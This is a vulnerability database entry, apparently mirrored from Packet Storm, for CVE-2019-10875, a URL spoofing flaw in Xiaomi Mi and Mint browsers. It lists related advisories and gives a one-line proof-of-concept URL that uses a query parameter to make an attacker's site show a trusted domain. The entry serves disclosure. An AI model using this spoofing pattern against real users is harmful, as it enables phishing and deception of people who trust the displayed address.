Xiaomi Mi Browser / Mint Browser URL Spoofing

🗓️ 11 Apr 2019 00:00:00Reported by Arif KhanType

packetstorm🔗 packetstormsecurity.com👁 36 Views

URL Spoofing in Xiaomi Mi and Mint Browse

Reporter	Title	Published	Views	Family All 11
Circl	CVE-2019-10875	5 Apr 201912:55	–	circl
CNVD	Xiaomi Mi browser and Xiaomi Mint Browser input validation error vulnerability	26 Apr 202200:00	–	cnvd
CVE	CVE-2019-10875	5 Apr 201912:36	–	cve
Cvelist	CVE-2019-10875	5 Apr 201912:36	–	cvelist
EUVD	EUVD-2019-2598	7 Oct 202500:30	–	euvd
NVD	CVE-2019-10875	5 Apr 201913:29	–	nvd
OSV	CVE-2019-10875	5 Apr 201913:29	–	osv
Prion	Spoofing	5 Apr 201913:29	–	prion
RedhatCVE	CVE-2019-10875	22 May 202506:16	–	redhatcve
The Hacker News	Unpatched Flaw in Xiaomi's Built-in Browser App Lets Hackers Spoof URLs	5 Apr 201910:44	–	thn

`# Exploit Title: URL Spoofing Exploit for Xiaomi Mi Browser (v10.5.6-g) and Mint Browser (v1.5.3)  
# Date : 11/04/2019  
# Exploit Author: Arif Khan (@payloadartist)  
# Vendor Homepage: www.xiaomi.com  
# Version : v10.5.6-g and v1.5.3  
# Tested On : MIUI OS, v10.1.3.0  
# CVE : CVE-2019-10875  
  
Exploit: https://www.evil.com/?q=www.target.com  
  
The attacker can thus pass off his site, www.evil.com as www.target.com due to the way Xiaomi browsers handle the query parameter's value.  
`

11 Apr 2019 00:00Current

6.6Medium risk

Vulners AI Score6.6

EPSS0.00596